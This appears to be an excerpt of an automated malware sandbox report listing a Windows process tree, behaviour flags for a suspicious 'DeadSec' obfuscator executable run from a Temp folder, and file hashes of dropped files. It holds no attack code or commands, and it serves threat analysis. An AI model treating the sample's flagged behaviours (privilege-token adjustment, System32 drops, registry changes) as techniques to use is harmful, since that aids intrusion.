c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1452
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1480
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1568
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1796
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1860
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1900
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1524
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2072
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2208
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2280
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2336
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2388
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2488
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2604
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2968
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2976
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3288
-
C:\Users\Admin\AppData\Local\Temp\www.DeadSec0000000000-obfusecator.exe"C:\Users\Admin\AppData\Local\Temp\www.DeadSec0000000000-obfusecator.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3816
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3988
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4700
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:3640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:3964
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2476
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4124
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3892
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:5060
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:4036
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:300
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD5ad306e0fe372fcd74ed11a9b7953997e
SHA127193dda05ad1065c9891ce9ccbac7e1e086635f
SHA256e7b37c5dd1c141155d7053f1b1908554482eb48b8579d3fdce6a00256f38e424
SHA512e26891a0b7ebba44947824fd6d54f5d4fd82050223f8e41367f63fa7beb7ec70eec606f0dbf5dfd3c3f1ec264c05c967259a454252bfbd5496a4bc1d0dc76cea
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Filesize412B
MD5087456508d26e75fa7bd22838ca75bfa
SHA1ade78f35938c96f34daa009926066d03836fbeb6
SHA256800a2ff46a962d9e905176cb2435681958c0e54f1bca4140b36802ef84937981
SHA512c37a5ab53ba6e320b5d2d565875ca66d6dd3cdf0cdbfbaf5e6673d515acabb7688b5c4a6615aee54299697241a1c7578061605d7bda05cab7fcbd36e13e88671